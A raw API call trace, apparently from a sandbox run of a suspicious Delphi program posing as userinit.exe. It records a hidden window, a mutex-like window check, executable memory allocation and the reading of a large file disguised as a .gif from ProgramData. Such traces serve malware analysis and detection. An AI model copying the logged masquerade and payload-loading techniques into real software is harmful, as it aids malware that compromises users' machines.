[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0168.240] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0168.240] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0168.240] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0168.240] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0168.240] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0168.240] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0168.240] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0168.240] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0168.240] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0168.240] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0168.240] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0168.240] GetVersion () returned 0x1db10106
[0168.240] GetCurrentProcessId () returned 0x850
[0168.240] GlobalAddAtomA (lpString="Delphi00000850") returned 0xc10c
[0168.240] GetCurrentThreadId () returned 0x518
[0168.240] GlobalAddAtomA (lpString="ControlOfs0040000000000518") returned 0xc10b
[0168.240] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000518") returned 0xc17f
[0168.240] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0168.240] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0168.240] GetSystemMetrics (nIndex=19) returned 1
[0168.290] GetSystemMetrics (nIndex=75) returned 1
[0168.290] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1181310, fWinIni=0x0 | out: pvParam=0x1181310) returned 1
[0168.290] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0168.290] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0168.290] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x4011b
[0168.290] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0168.290] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0168.290] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0168.290] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x170067
[0168.290] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0xc01e3
[0168.291] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x1101bd
[0168.291] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0xc01c1
[0168.291] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0xe01a7
[0168.291] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0xe019d
[0168.291] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0168.291] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0168.291] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0168.291] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0168.291] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0168.291] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0168.291] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0168.292] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0168.292] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0168.292] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0168.292] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0168.292] GetDC (hWnd=0x0) returned 0x1501085f
[0168.292] GetDeviceCaps (hdc=0x1501085f, index=90) returned 96
[0168.292] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0168.292] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0168.292] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x118155c) returned 1
[0168.292] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0xaf97f, fWinIni=0x0 | out: pvParam=0xaf97f) returned 1
[0168.292] CreateFontIndirectA (lplf=0xaf97f) returned 0x400a0871
[0168.292] GetObjectA (in: h=0x400a0871, c=60, pv=0xaf770 | out: pv=0xaf770) returned 60
[0168.292] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0xaf82b, fWinIni=0x0 | out: pvParam=0xaf82b) returned 1
[0168.292] CreateFontIndirectA (lplf=0xaf907) returned 0x840a0862
[0168.292] GetObjectA (in: h=0x840a0862, c=60, pv=0xaf770 | out: pv=0xaf770) returned 60
[0168.293] CreateFontIndirectA (lplf=0xaf8cb) returned 0x330a0874
[0168.293] GetObjectA (in: h=0x330a0874, c=60, pv=0xaf770 | out: pv=0xaf770) returned 60
[0168.293] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0168.293] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0xaf8df, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0168.293] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0xaf8df | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0168.293] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x60000
[0168.293] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0xaf894 | out: lpWndClass=0xaf894) returned 0
[0168.293] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0168.293] GetSystemMetrics (nIndex=0) returned 1440
[0168.293] GetSystemMetrics (nIndex=1) returned 900
[0168.293] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xb01e4
[0168.297] SetWindowLongA (hWnd=0xb01e4, nIndex=-4, dwNewLong=397295) returned 4219500
[0168.297] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0168.297] SendMessageA (hWnd=0xb01e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0168.297] DefWindowProcA (hWnd=0xb01e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0168.308] DefWindowProcA (hWnd=0xb01e4, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xb01c7
[0168.308] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0168.309] SetClassLongA (hWnd=0xb01e4, nIndex=-14, dwNewLong=65575) returned 0x0
[0168.309] GetSystemMenu (hWnd=0xb01e4, bRevert=0) returned 0xb01bb
[0168.310] DeleteMenu (hMenu=0xb01bb, uPosition=0xf030, uFlags=0x0) returned 1
[0168.310] DeleteMenu (hMenu=0xb01bb, uPosition=0xf000, uFlags=0x0) returned 1
[0168.311] DeleteMenu (hMenu=0xb01bb, uPosition=0xf010, uFlags=0x0) returned 1
[0168.311] GetKeyboardLayoutList (in: nBuff=64, lpList=0xaf860 | out: lpList=0xaf860) returned 1
[0168.312] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0168.312] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0168.312] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0168.312] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0168.313] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0168.313] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0168.313] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0168.313] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0168.314] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0168.314] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0168.314] GetCurrentThreadId () returned 0x518
[0168.314] GlobalAddAtomA (lpString="WndProcPtr0040000000000518") returned 0xc10a
[0168.314] VirtualAlloc (lpAddress=0x1184000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1184000
[0168.314] ShowWindow (hWnd=0xb01e4, nCmdShow=0) returned 0
[0168.314] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0168.314] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0168.315] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xaf5e0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xaf5e0*=0) returned 0x0
[0168.315] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xaf5d8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xaf5d8*=0) returned 0x0
[0168.315] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xaf5d8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xaf5d8*=0) returned 0x10be00
[0168.315] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xaf5d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xaf5d8*=0) returned 0x0
[0168.315] GlobalLock (hMem=0x13b0004) returned 0x21c0020
[0168.315] ReadFile (in: hFile=0x98, lpBuffer=0x21c0020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0xaf5f4, lpOverlapped=0x0 | out: lpBuffer=0x21c0020*, lpNumberOfBytesRead=0xaf5f4*=0x10be00, lpOverlapped=0x0) returned 1
[0168.380] CloseHandle (hObject=0x98) returned 1
[0168.380] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.381] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.381] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.381] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x4000, uFlags=0x2) returned 0x13b000c
[0168.381] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.381] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.382] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.382] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x6000, uFlags=0x2) returned 0x13b000c
[0168.382] GlobalLock (hMem=0x13b000c) returned 0x20a820
[0168.382] GlobalHandle (pMem=0x20a820) returned 0x13b000c
[0168.382] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.382] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x8000, uFlags=0x2) returned 0x13b000c
[0168.383] GlobalLock (hMem=0x13b000c) returned 0x210830
[0168.383] GlobalHandle (pMem=0x210830) returned 0x13b000c
[0168.383] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.383] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xa000, uFlags=0x2) returned 0x13b000c
[0168.383] GlobalLock (hMem=0x13b000c) returned 0x210830
[0168.384] GlobalHandle (pMem=0x210830) returned 0x13b000c
[0168.384] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.384] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xc000, uFlags=0x2) returned 0x13b000c
[0168.384] GlobalLock (hMem=0x13b000c) returned 0x21a840
[0168.385] GlobalHandle (pMem=0x21a840) returned 0x13b000c
[0168.385] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.385] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xe000, uFlags=0x2) returned 0x13b000c
[0168.385] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.385] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.385] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.385] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x10000, uFlags=0x2) returned 0x13b000c
[0168.385] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.386] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.386] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.386] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x12000, uFlags=0x2) returned 0x13b000c
[0168.386] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.386] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.386] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.386] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x14000, uFlags=0x2) returned 0x13b000c
[0168.386] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.387] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.387] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.387] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x16000, uFlags=0x2) returned 0x13b000c
[0168.387] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.387] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.387] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.387] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x18000, uFlags=0x2) returned 0x13b000c
[0168.387] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.388] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.388] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.388] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x1a000, uFlags=0x2) returned 0x13b000c
[0168.388] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.388] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.388] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.388] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x1c000, uFlags=0x2) returned 0x13b000c
[0168.388] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.389] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.389] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.389] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x1e000, uFlags=0x2) returned 0x13b000c
[0168.389] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.389] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.389] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.389] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x20000, uFlags=0x2) returned 0x13b000c
[0168.389] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.390] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.390] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.390] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x22000, uFlags=0x2) returned 0x13b000c
[0168.391] GlobalLock (hMem=0x13b000c) returned 0x226820
[0168.392] GlobalHandle (pMem=0x226820) returned 0x13b000c
[0168.392] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.392] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x24000, uFlags=0x2) returned 0x13b000c
[0168.392] GlobalLock (hMem=0x13b000c) returned 0x226820
[0168.392] GlobalHandle (pMem=0x226820) returned 0x13b000c
[0168.392] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.392] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x26000, uFlags=0x2) returned 0x13b000c
[0168.394] GlobalLock (hMem=0x13b000c) returned 0x24a830
[0168.394] GlobalHandle (pMem=0x24a830) returned 0x13b000c
[0168.394] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.394] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x28000, uFlags=0x2) returned 0x13b000c
[0168.394] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.395] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.395] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.395] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x2a000, uFlags=0x2) returned 0x13b000c
[0168.395] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.396] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.396] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.396] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x2c000, uFlags=0x2) returned 0x13b000c
[0168.396] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.396] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.396] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.396] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x2e000, uFlags=0x2) returned 0x13b000c
[0168.396] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.396] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.396] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.397] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x30000, uFlags=0x2) returned 0x13b000c
[0168.397] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.397] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.397] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.397] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x32000, uFlags=0x2) returned 0x13b000c
[0168.397] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.397] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.397] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.397] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x34000, uFlags=0x2) returned 0x13b000c
[0168.398] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.398] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.398] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.398] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x36000, uFlags=0x2) returned 0x13b000c
[0168.398] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.398] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.398] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.398] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x38000, uFlags=0x2) returned 0x13b000c
[0168.398] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.399] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.399] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.399] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x3a000, uFlags=0x2) returned 0x13b000c
[0168.399] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.399] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.399] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.399] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x3c000, uFlags=0x2) returned 0x13b000c
[0168.399] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.400] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.400] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.400] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x3e000, uFlags=0x2) returned 0x13b000c
[0168.400] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.400] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.400] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.400] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x40000, uFlags=0x2) returned 0x13b000c
[0168.400] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.401] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.401] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.401] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x42000, uFlags=0x2) returned 0x13b000c
[0168.401] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.401] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.401] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.401] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x44000, uFlags=0x2) returned 0x13b000c
[0168.401] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.402] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.402] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.402] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x46000, uFlags=0x2) returned 0x13b000c
[0168.402] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.402] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.402] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.402] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x48000, uFlags=0x2) returned 0x13b000c
[0168.402] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.403] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.403] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.403] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x4a000, uFlags=0x2) returned 0x13b000c
[0168.403] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.403] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.403] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.403] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x4c000, uFlags=0x2) returned 0x13b000c
[0168.403] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.404] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.404] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.404] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x4e000, uFlags=0x2) returned 0x13b000c
[0168.404] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.404] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.404] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.404] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x50000, uFlags=0x2) returned 0x13b000c
[0168.404] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.405] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.405] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.405] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x52000, uFlags=0x2) returned 0x13b000c
[0168.405] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.405] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.405] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.405] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x54000, uFlags=0x2) returned 0x13b000c
[0168.405] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.406] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.406] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.406] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x56000, uFlags=0x2) returned 0x13b000c
[0168.406] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.406] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.406] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.406] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x58000, uFlags=0x2) returned 0x13b000c
[0168.406] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.407] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.407] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.407] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x5a000, uFlags=0x2) returned 0x13b000c
[0168.407] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.407] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.407] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.407] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x5c000, uFlags=0x2) returned 0x13b000c
[0168.407] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.408] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.408] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.408] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x5e000, uFlags=0x2) returned 0x13b000c
[0168.408] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.408] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.408] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.408] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x60000, uFlags=0x2) returned 0x13b000c
[0168.408] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.409] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.409] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.409] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x62000, uFlags=0x2) returned 0x13b000c
[0168.409] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.409] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.409] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.409] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x64000, uFlags=0x2) returned 0x13b000c
